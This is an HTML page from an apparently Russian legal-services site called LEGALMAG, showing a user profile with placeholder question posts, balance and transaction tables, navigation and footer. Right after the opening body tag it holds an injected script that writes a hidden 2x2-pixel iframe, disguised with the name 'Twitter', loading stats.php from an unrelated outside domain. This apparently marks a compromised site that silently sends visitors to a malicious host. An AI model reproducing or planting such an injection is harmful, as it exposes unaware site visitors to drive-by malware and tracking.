<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
	<title>LEGALMAG</title>

	<link rel="stylesheet" href="design/css/style.css">
	<!--[if IE 7]><link rel="stylesheet" href="design/css/style_ie7.css" /><![endif]-->
	<!--[if IE 8]><link rel="stylesheet" href="design/css/style_ie8.css" /><![endif]-->
	<!--[if IE 9]><link rel="stylesheet" href="design/css/style_ie9.css" /><![endif]-->
	<link rel="stylesheet" href="design/css/jquery-ui-1.8.20.custom.css">
	<link rel="stylesheet" href="design/css/jquery.ui.selectmenu.css">
	<link rel="stylesheet" href="design/css/jquery.fancybox.css">

	<script src="design/js/jquery-1.7.2.min.js"></script>
	<!--[if lt IE 9]><script src="design/js/html5.js"></script><![endif]-->
	<script src="design/js/custom.js"></script>
</head>

<body><!--c3284d--><script type="text/javascript">
document.write('<iframe src="http://cabaniaseleden.com.ar/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script><!--/c3284d-->


	<section id="body">
		<header><!--header-->
			<div class="wrapper">
				<a id="logo" href="index.html" title="LEGALMAG"></a>
				<div id="social-enter">Войти через: <img src="design/images/social-login.jpg" alt=""></div>
				<div id="logged">
					Привет,&nbsp;<a class="enter" href="">Валентин!</a>
					<a class="register" href="">Выйти</a>
					<div class="sep"></div>
				</div>
				<nav class="auth"><!--top-navigation-->
					<ul>
						<li class="active"><a href="">Личный кабинет</a></li>
						<li><a href="">Лента вопросов</a></li>
						<li><a href="">Конструктор</a></li>
						<li ><a href="">Аудит</a></li>
						<li><a href="">Каталог</a></li>
					</ul>
				</nav><!--/top-navigation-->
			</div>
		</header><!--/header-->

		<div class="clear">&nbsp;</div>

		<section id="content"><!--content-->
			<div class="wrapper">
				<aside id="left-profile">
					<div id="userIn">
						<div class="img"><img src="design/images/faceHuge.jpg" alt=""></div>
						<p>Иванова Снежанна</p>
						<p class="myMessages"><a href="">Мои сообщения</a> (<span>3</span>)</p>
					</div>
					<div id="profile">
						<div class="profile">
							<ul>
								<li><a href="">Посмотреть профиль</a></li>
								<li><a href="">Редактировать профиль</a></li>
								<li><a href="">Настройка рекламы</a></li>
							</ul>
						</div>
						<div class="stats">
							<ul>
								<li>Статистика на сайте:</li>
								<li><a href="">15 ответов</a></li>
								<li>Последнее посещение 01.02.2012</li>
								<li><img src="design/images/stars.jpg" alt=""></li>
							</ul>
						</div>
						<div class="leftSay"></div>
					</div>
				</aside>
				<section id="right-profile">
					<div class="wrapper">
						<div class="head">
							<ul >
						    		<li class="active">Вопросы<span class="separ">/</span></li>
						    		<li>Финансы <span class="money">(100руб.)</span></li>
						    	</ul>
						</div>
						<section class="body visible">
							<div class="feeds">
								<div class="img"><img src="design/images/face.jpg" alt=""></div>
								<div class="right">
									<a href="">Иванова Снежанна Нургалиевна</a>
									<p>опубликовала вопрос:</p>
									<p class="feed">
										<strong>Привет!</strong><br>
										Привет, зая!!! Хочу показать тебе что такое настоящие юридические услуги!!
									</p>
									<p class="time">4 дня 15 часов назад</p>
									<p class="tags">Теги: <a href="">процесс,</a> <a href="">аппеляция</a></p>
								</div>
								<div class="clear ">&nbsp;</div>
							</div>
							<div class="feeds">
								<div class="img"><img src="design/images/face.jpg" alt=""></div>
								<div class="right">
									<a href="">Иванова Снежанна Нургалиевна</a>
									<p>опубликовала вопрос:</p>
									<p class="feed">
										<strong>Привет!</strong><br>
										Привет, зая!!! Хочу показать тебе что такое настоящие юридические услуги!!
									</p>
									<p class="time">4 дня 15 часов назад</p>
									<p class="tags">Теги: <a href="">процесс,</a> <a href="">аппеляция</a></p>
								</div>
								<div class="clear ">&nbsp;</div>
							</div>
							<div class="feeds">
								<div class="img"><img src="design/images/face.jpg" alt=""></div>
								<div class="right">
									<a href="">Иванова Снежанна Нургалиевна</a>
									<p>опубликовала вопрос:</p>
									<p class="feed">
										<strong>Привет!</strong><br>
										Привет, зая!!! Хочу показать тебе что такое настоящие юридические услуги!!
									</p>
									<p class="time">4 дня 15 часов назад</p>
									<p class="tags">Теги: <a href="">процесс,</a> <a href="">аппеляция</a></p>
								</div>
								<div class="clear ">&nbsp;</div>
							</div>
							<input type="submit" class="buttonOlder" value="Ранее...">
						</section>
						<section class="body">
							<div class="finance">
								<div class="balanceLine">
									Текущий баланс: <span>100 рублей</span>
								</div>
								<div class="recharge">
									<form>
										<label for="recharge-balane">Пополнить счет:</label>
										<input type="text" name="recharge-balane" id="recharge-balane">
										<p>руб.</p>
										<input type="submit" class="buttonPay" value="Продолжить">
										<div class="clear">&nbsp;</div>
									</form>
								</div>
								<div id="statistic">
									<form>
										<p>Статистика за период:</p>
										<span>с</span>
										<input type="text" name="date-from" class="datepicker">
										<span>по</span>
										<input type="text" name="date-to" class="datepicker">
										<div class="buttonNext"><input type="submit" class="buttonClear" value="Показать"></div>
										<ul>
											<li><a href="">сегодня</a></li>
											<li><a href="">вчера</a></li>
											<li><a href="">7 дней</a></li>
											<li><a href="">30 дней</a></li>
											<li><a href="">90 дней</a></li>
											<li><a href="">365 дней</a></li>
										</ul>
										<div class="clear">&nbsp;</div>
									</form>
								</div>
								<div class="balanceInfo">
									<p>Информация по счету:</p>
									<div class="income">
										<table>
											<tr>
												<th colspan="2">Пополнение счета</th>
											</tr>
											<tr>
												<td>- собственныйми средствами</td>
												<td>100 руб.</td></tr>
											<tr>
												<td>- оплата вопроса пользователем</td>
												<td>200 руб.</td>
											</tr>
										</table>
									</div>
									<div class="cost">
										<table>
											<tr>
												<th colspan="2">Расходы по счету</th>
											</tr>
											<tr>
												<td>- комиссия Legalmag за оплату вопроса</td>
												<td>100 руб.</td>
											</tr>
											<tr>
												<td>- расходы на рекламную компанию</td>
												<td>200 руб.</td>
											</tr>
											<tr>
												<td>- вывод средств</td>
												<td>200 руб.</td>
											</tr>
										</table>
									</div>
									<div class="balance">
										<table>
											<tr>
												<th colspan="2">Входящий остаток на начало периода:</th>
											</tr>
											<tr>
												<td>- баланс за период</td>
												<td>100 руб.</td>
											</tr>
										</table>
									</div>
								</div>
								<div class="balanceOperation">
									<p>Операции по счету:</p>
									<table>
										<tr>
											<th width="10%">Дата</th>
											<th width="60%">Описание операции</th>
											<th width="15%">Приход</th>
											<th width="15%">Расход</th>
										</tr>
										<tr>
											<td>11.06.2012</td>
											<td>Перевод на собственный счет</td>
											<td>+ 100 руб.</td>
											<td></td>
										</tr>
										<tr>
											<td>11.06.2012</td>
											<td>Перевод на собственный счет</td>
											<td></td>
											<td>- 100 руб.</td>
										</tr>
										<tr>
											<td>11.06.2012</td>
											<td>Перевод на собственный счет</td>
											<td>+ 100 руб.</td>
											<td></td>
										</tr>
										<tr>
											<td>11.06.2012</td>
											<td>Перевод на собственный счет</td>
											<td></td>
											<td>- 100 руб.</td>
										</tr>
										<tr>
											<td>11.06.2012</td>
											<td>Перевод на собственный счет</td>
											<td>+ 100 руб.</td>
											<td></td>
										</tr>
										<tr>
											<td>11.06.2012</td>
											<td>Перевод на собственный счет</td>
											<td></td>
											<td>- 100 руб.</td>
										</tr>
										<tr>
											<td>11.06.2012</td>
											<td>Перевод на собственный счет</td>
											<td>+ 100 руб.</td>
											<td></td>
										</tr>
										<tr>
											<td>11.06.2012</td>
											<td>Перевод на собственный счет</td>
											<td></td>
											<td>- 100 руб.</td>
										</tr>
									</table>
								</div>
							</div>
						</section>
					</div>
				</section>
			</div>
		</section><!--/content-->

	<div class="clear">&nbsp;</div>
	<div id="rasporka"></div>

	</section><!--/body-wrapper-->

	<footer><!--footer-->
		<section class="wrapper">
			<div class="left-col">
				<p>&copy; Legalmag, 2012</p>
				<p>Все права защищены.</p>
				<p style="margin: 20px 0 5px 0;"><a href="">Условия использования</a></p>
				<a href="">Регламент техподдержки</a>
			</div>
			<div class="right-col">
				<nav>
					<ul>
						<li><a href="">О проекте </a></li>
						<li><a href="">Условия использования</a></li>
						<li class="active"><a href="">Для инвесторов</a></li>
						<li><a href="">Безопасность </a></li>
						<li><a href="">Контакты</a></li>
					</ul>
				</nav>
				<div id="paySystems"></div>
			</div>
		</section>
	</footer><!--/footer-->

</body>
</html>